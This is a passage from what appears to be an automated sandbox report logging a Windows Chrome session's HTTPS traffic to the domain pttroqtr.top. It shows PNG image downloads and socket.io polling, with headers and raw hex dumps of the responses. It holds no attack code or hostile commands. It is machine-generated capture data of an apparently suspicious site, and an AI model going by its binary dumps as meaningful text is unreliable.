                                                                                                                                                                                            2024-09-28 03:39:37 UTC1194INData Raw: 27 a2 25 f9 1f 55 ce 32 20 3f b1 69 74 50 69 0c dc 90 78 2e 61 df 77 29 9c f6 50 76 e1 b6 cb a1 21 38 b0 9a 18 9e 35 9b 7f 6a 6d 8a d6 75 38 52 99 62 12 16 0d 02 69 e1 e8 e4 2d 3c 0a fb 7f a7 ad 37 bb e7 be e4 fa 65 44 39 53 e0 3e 8e 35 27 08 a3 bf f1 bb c9 10 d1 de 55 f2 43 ce d7 56 01 be 45 3e c0 6f 25 0d 12 54 ae 65 02 87 a6 02 43 99 d8 4a 1c 43 3a 78 a6 6e 79 af 3d 5f 94 6b 49 0f 08 0e 1f 88 73 55 83 93 49 01 6d d8 a1 dc a0 41 80 40 b0 b1 8d 13 0c d7 c0 61 40 7a fb 5a 06 32 ee 49 7a c1 06 74 28 7b 88 aa 81 86 a0 e6 7d b6 7b 2e e5 01 f6 c7 09 9b 0f 82 78 7e c0 9d 95 13 c8 2f 2c 30 86 eb 37 d6 ff 40 48 7a a4 be ea f9 5c e2 6d 88 48 17 98 b3 43 4f 39 a3 80 9a 69 a1 d8 10 42 1a 18 e9 99 61 bf 29 f4 4c 44 64 55 bc 44 c4 72 03 3d 41 78 06 06 0d 63 49 af 2d
                                                                                                                                                                                            Data Ascii: '%U2 ?itPix.aw)Pv!85jmu8Rbi-<7eD9S>5'UCVE>o%TeCJC:xny=_kIsUImA@a@zZ2Izt({}{.x~/,07@Hz\mHCO9iBa)LDdUDr=AxcI-


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            91192.168.2.5498178.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:37 UTC599OUTGET /help/layout/images/48.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:37 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:37 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 27613
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"6bdd-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:37 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 6b 6a 49 44 41 54 78 da ec fd 4d 76 1a 4b 13 70 0b e7 79 d7 db 17 a7 fd 35 84 5b b7 29 ce 08 84 47 60 3c 02 e3 11 18 8f c0 78 04 c6 23 30 1a c1 c1 23 70 69 04 46 cd af 65 d4 b8 ed 83 46 f0 5c 05 8a 14 41 2a b3 fe a8 82 02 ed bd 16 4b 36 82 fa c9 2a 94 9b c8 cc 88 bf fe f7 bf ff 39 00 00 00 00 38 2d fe 42 e2 00 00 00 00 90 38 00 00 00 00 40 e2 00 00 00 00 00 89 03 00 00 00 40 e2 00 00 00 00 00 89 03 00 00 00 00 24 0e 00 00 00 00 89 03 00 00 00 00 24 0e 00 00 00 00 90 38 00 00 00 00
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<kjIDATxMvKpy5[)G`<x#0#piFeF\A*K6*98-B8@@$$8
                                                                                                                                                                                            2024-09-28 03:39:37 UTC11540INData Raw: 6b ae 6a 85 44 f7 3e e8 c3 05 02 b1 72 25 0a ca eb e2 95 af 2a 11 fd 03 0a 81 8d 1c fa 7f 97 f9 e2 70 90 c8 5b 8e c4 65 25 a4 f7 5a 1f 9f 02 d9 f6 b5 69 97 39 db 78 68 63 45 f8 9e d7 2b 56 a9 c1 7f be 00 4e 1e 86 53 e1 6c 30 c3 88 96 17 25 82 3a 70 9c 99 76 94 32 49 7c d4 c2 f6 a5 e3 fa ad ff 6d 74 c8 48 87 58 27 0d ca 5c 11 0f 46 ec 76 1e 4d 0b 83 b6 9b 1f 6e f4 ff ee b9 f2 95 0c 52 88 9c ce 8f 20 6f 85 f7 82 fe 7e a4 22 56 46 46 63 53 00 16 7a 3f 48 ee b5 61 87 3e 67 3d 97 ae b2 b2 d7 54 03 80 ae 40 24 0e ce 45 e0 86 91 0e 48 04 60 da c1 c3 f5 12 37 a8 79 ae 1b a9 48 45 18 35 42 e5 a3 7d 23 d7 e0 8a 41 dd 67 a6 c3 87 22 73 63 d7 ee f0 f5 85 db 46 87 c2 76 08 9f f2 85 db cb 30 68 f9 b8 a5 fd 45 da 66 47 8e 4e f9 2f 09 0f 89 4a 0d 4b f7 72 31 8c 1d 16 b6
                                                                                                                                                                                            Data Ascii: kjD>r%*p[e%Zi9xhcE+VNSl0%:pv2I|mtHX'\FvMnR o~"VFFcSz?Ha>g=T@$EH`7yHE5B}#Ag"scFv0hEfGN/JKr1


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            92192.168.2.5498208.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:37 UTC361OUTGET /help/layout/images/41.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:37 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:37 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 19866
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"4d9a-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:37 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 4d 27 49 44 41 54 78 da ec dd 0b 78 5c 77 79 e7 f1 d7 ba f8 ee 48 b6 e3 6b 8c 25 43 6e 84 8b 94 90 44 21 24 68 1c 42 bb 4d f2 60 65 cb 66 69 bb ac 65 fa 6c 16 b6 2d 56 ba ec b2 6c 21 1e 17 b6 2c 94 12 f9 d9 87 07 96 2d f5 b8 a5 5c d2 dd 46 ce 93 a4 40 21 1e 25 21 c5 04 92 31 21 21 24 21 1a d9 8e e3 bb 25 cb b2 25 df b4 e7 3d e7 3f d2 cc 68 24 cd 39 73 ce 99 33 d2 f7 f3 3c 27 8e 6e 33 67 ce 9c 99 f3 9b f7 7f 9b 35 32 32 22 00 00 00 a8 2c 55 1c 02 00 00 00 42 1c 00 00 00 08 71 00 00
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<M'IDATxx\wyHk%CnD!$hBM`efiel-Vl!,-\F@!%!1!!$!%%=?h$9s3<'n3g522",UBq
                                                                                                                                                                                            2024-09-28 03:39:37 UTC3793INData Raw: 1a 9e a3 21 43 3b e2 ff cd 8b c7 73 7e 47 83 9b 06 b8 ae 81 b3 9e 26 fe 75 eb 76 2b e8 bd f1 3b 8d f2 f8 f5 2b e5 f3 6b 2f 09 f4 be b4 ba f8 85 77 5c ea db ed e9 7c 7a f7 f7 e4 5c 8b f7 50 85 f3 18 dc 52 2d 49 6b d3 24 bf 6b 74 d3 af 9d ef c7 42 0e 73 7d f6 c0 08 eb ff 24 98 66 56 26 74 9d 6e 01 2e f7 83 b2 df 7d 2d 59 92 8b 10 07 8c 06 b9 ce ec 0b d3 17 f7 0d c8 81 53 b9 7d df fe f2 c6 95 52 35 2b dc 15 18 b4 59 f7 c3 57 2d 0e 74 e5 87 bf 68 a8 93 a6 65 73 7d bb bd 3f 7f f6 48 fe bc 70 f4 77 72 1f e0 12 26 b4 b5 4e f0 1b ad 26 d0 b5 87 be 6f 3a b1 b0 d3 fc e9 77 90 e3 82 1c 7d 5e 02 5c 50 83 1c 58 92 8b 10 07 e4 18 bd 20 6a 08 f9 c4 cf 0e e6 fc 50 fb b4 3d 73 cb 65 be 06 9e 62 ec 39 3a 14 58 b3 6a fb e2 b9 b2 e9 9a c5 be dd 9e 36 a3 ea 28 df 2c 3b ac 80
                                                                                                                                                                                            Data Ascii: !C;s~G&uv+;+k/w\|z\PR-Ik$ktBs}$fV&tn.}-YS}R5+YW-thes}?Hpwr&N&o:w}^\PX jP=seb9:Xj6(,;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            93192.168.2.5498198.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:37 UTC599OUTGET /help/layout/images/49.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:37 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:37 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 10988
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"2aec-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:37 UTC10988INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 2a 79 49 44 41 54 78 da ec dd 4f 52 db e8 1a 2f 60 f5 ad 3b 27 3b 80 33 e8 31 9c 15 e0 ac 20 ee 71 aa 1a 67 05 a1 57 80 59 41 c8 0a 62 ba 2a e3 43 56 80 59 41 93 71 06 c7 ac e0 86 15 e4 ea 6d 3e 4e bb 69 4b 96 6c c9 96 ec e7 a9 72 25 85 8d 2c 7d 92 d1 cf df df 9f 7e fc f8 91 01 00 d0 2f ff 47 11 00 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<*yIDATxOR/`;';31 qgWYAb*CVYAqm>NiKlr%,}~/GqqqBBB qqq


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            94192.168.2.5498218.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:37 UTC361OUTGET /help/layout/images/43.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:37 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:37 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 18614
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"48b6-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:37 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 48 43 49 44 41 54 78 da ec dd 0b 9c 5c 65 99 e7 f1 e7 84 90 fb a5 93 90 1b 10 ba 02 26 01 01 d3 80 82 e3 a8 69 44 57 47 64 d3 cc 38 82 33 ba 69 c6 11 77 57 19 1a c6 dd 61 76 d5 34 5e 56 66 75 a0 59 76 dc 51 3f 23 95 45 06 65 5c 48 06 71 9c 19 95 0e 8c 0a 08 a4 43 80 90 c4 24 1d 20 e4 9e 74 a7 73 bf d5 be 4f 9d f7 a4 ab ab eb 72 6e 75 ff 7d 3f 9f a2 43 77 5d 4e 9d 3a 55 e7 5f ef e5 79 9d 54 2a 25 00 00 00 a8 2d 0e 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<HCIDATx\e&iDWGd83iwWav4^VfuYvQ?#Ee\HqC$ tsOrnu}?Cw]N:U_yT*%-!Bq8
                                                                                                                                                                                            2024-09-28 03:39:37 UTC2541INData Raw: 2d 7b e5 d1 81 68 33 b7 af 9f 38 5a 26 9f 99 bb bb b5 ff f8 c9 7c f7 9f ab a7 83 10 07 a0 e4 f4 83 a7 5c ab 51 68 57 7a 8b 94 be 15 ce d3 29 65 2a 07 03 a0 76 83 5b 4c a6 94 ab 97 89 10 07 20 93 76 03 2c 2e c3 e3 94 b2 ac 48 3e da d2 b8 b0 86 5f 9b 23 e6 32 86 43 14 d9 4e 9c 3c 25 23 cf 18 d1 50 cf f9 c0 d1 93 f2 44 6f 5f ba 1b f3 be 1d 03 d5 b6 79 37 95 6b e9 cb 11 1c fe 00 32 b4 4b e9 97 c1 5a 56 81 00 e7 3d b7 fe 1a 7d 5d 74 9f fd 8e d4 ff 12 65 37 49 19 57 43 f1 e1 f5 6a de 59 da 02 f5 f9 5f 6c 94 7f fa ed be 86 f9 80 7a 6c dd 9e f4 73 9e f6 c8 1a f9 e8 0b af 97 23 c0 e9 67 86 d6 78 d3 65 b2 fc 16 71 2c 5b 77 ea 48 01 80 41 da 05 d0 2a ee cc aa 52 b4 5a 95 6b 1c 5c 2e 3d 19 cf 2d ee f1 71 1a ae be 63 2e 7f 53 82 ed 5e 99 b1 cf 74 fb 3b a5 4c 6b f7 16
                                                                                                                                                                                            Data Ascii: -{h38Z&|\QhWz)e*v[L v,.H>_#2CN<%#PDo_y7k2KZV=}]te7IWCjY_lzls#gxeq,[wHA*RZk\.=-qc.S^t;Lk


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            95192.168.2.5498228.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:37 UTC361OUTGET /help/layout/images/45.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:37 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:37 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 33304
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"8218-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:37 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 81 a5 49 44 41 54 78 da ec 9d 0b 78 14 f5 bd f7 ff b9 ec 6e ee 09 21 24 dc 42 42 10 b9 08 12 2c a2 5c 94 20 1e db aa 55 5a 6b ad ad 3d a2 f6 9c 62 df b7 42 6d 6b 8f ed 6b c5 fa 9e 72 6a 5b c5 f6 7d d4 f6 b4 15 ce e9 cd 5a 2d 55 8b d6 23 12 14 10 28 ca b5 02 02 21 04 42 08 84 b0 b9 67 b3 b9 bc f3 9d ec 2c b3 bb b3 3b 33 bb b3 9b dd cd f7 f3 3c 03 9b dd d9 dd d9 99 ff cc ff 3b bf 6b ca c0 c0 80 20 84 10 42 08 21 89 45 2a 77 01 21 84 10 42 08 45 1c 21 84 10 42 08 a1 88 23 84 10 42 08
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<IDATxxn!$BB,\ UZk=bBmkkrj[}Z-U#(!Bg,;3<;k B!E*w!BE!B#B
                                                                                                                                                                                            2024-09-28 03:39:37 UTC16384INData Raw: 7c 40 9e 54 f5 44 5c aa 81 f2 0d a9 b9 79 96 6d 1b 04 05 3b 34 c4 96 8e c7 bf 61 7a 9f 63 5c f4 e7 fa ba fc 95 b6 6d ea 1b 85 a3 6f ae 4a b6 ae 0d b2 5b d5 d6 d8 8e 72 22 b3 75 ae 1b 84 50 c4 11 32 94 ec 7f 69 39 6a c2 2d 4a 96 df 53 7c e9 12 51 32 f3 76 e3 27 75 9b 7e f9 86 b4 4b 2f b7 6c fb fa 4f 1f e7 a0 0b 01 e2 0f ed 9f ba d2 b2 cf eb 7a f6 3b 61 75 7a c0 b8 e8 c9 0d 1d b7 89 d2 20 c9 26 e0 14 32 df 6e ab 3c b1 62 c1 ca 5c 0e 49 42 11 47 48 5c b3 26 19 7e 04 aa df 97 2d f8 8a c8 2c a8 88 eb ed ec fb 68 1f 47 9c 1f a9 33 f2 85 7d c9 7c 61 9b 7d b5 a5 05 95 51 4e 24 56 3d 57 93 91 ac 5d cd 6c 29 42 28 e2 08 89 57 f6 bf b4 1c d9 a8 09 ef 26 41 f1 df b1 73 be 64 b8 c0 aa 59 d2 a6 ce b5 ec b3 fa db 5a 39 f0 54 c2 cd 71 d3 e7 e5 6c 53 ab 41 39 91 b6 07 1f
                                                                                                                                                                                            Data Ascii: |@TD\ym;4azc\moJ[r"uP2i9j-JS|Q2v'u~K/lOz;auz &2n<b\IBGH\&~-,hG3}|a}QN$V=W]l)B(W&AsdYZ9TqlSA9
                                                                                                                                                                                            2024-09-28 03:39:37 UTC847INData Raw: 21 4b ae af 56 f9 8f 68 a5 0c 71 12 b6 fa 37 56 fc c8 de f9 20 c0 ed f9 3e ee 85 ff f4 ba 59 dc 30 bc 2c 32 3c bc 28 fa 72 f4 68 6f 7e aa e0 47 70 03 40 88 03 30 dd 81 ae 5a dd 1c a9 4a 3b 32 d6 be 73 f9 95 9e 75 77 2e 2c 3a 7e 56 cd 79 21 6e 9e 27 2d 4c 06 ee 2e 39 3c 34 a7 f0 6f dd a3 6e 01 82 95 8c 96 b9 7b df a5 0d 71 12 16 07 96 97 ff 89 ee ed 39 03 5d 5e 57 ef ae e1 c2 82 4d 2a 92 17 9b fb df 6f a8 c8 e5 7e 95 d7 32 a4 72 db 47 52 fd 69 b3 15 6c 1b d8 0a 0b 00 21 0e c0 4c 09 74 55 56 98 b3 4f 9e 23 64 3d 7f 3c 57 e5 0c 8d aa bc b6 01 95 d3 3f a2 a2 cd fd b2 ae 2e 6e 85 1b e9 3b 22 23 77 ed 3a eb c1 8c 50 25 b7 5d ab 5c 3d ea dc 21 ce ec d7 b6 79 de d7 82 8c f4 59 8f c9 6e be 6b 7f 95 c7 55 e5 7c 6c 7d 8f 96 a9 91 58 44 15 1e 6a f7 0a 70 e7 ac c7 65
                                                                                                                                                                                            Data Ascii: !KVhq7V >Y0,2<(rho~Gp@0ZJ;2suw.,:~Vy!n'-L.9<4on{q9]^WM*o~2rGRil!LtUVO#d=<W?.n;"#w:P%]\=!yYnkU|l}XDjpe


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            96192.168.2.5498238.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:37 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjcVA&sid=H_Y22m0FJjANkstPAEf3 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:37 UTC166INHTTP/1.1 400 Bad Request
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:37 GMT
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            97192.168.2.5498248.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:37 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjcF_&sid=H_Y22m0FJjANkstPAEf3 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:37 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:37 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:37 UTC1INData Raw: 31
                                                                                                                                                                                            Data Ascii: 1


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            98192.168.2.5498278.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:37 UTC670OUTPOST /socket.io/?EIO=4&transport=polling&t=P8sjcVq&sid=H_Y22m0FJjANkstPAEf3 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 49
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Content-type: text/plain;charset=UTF-8
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
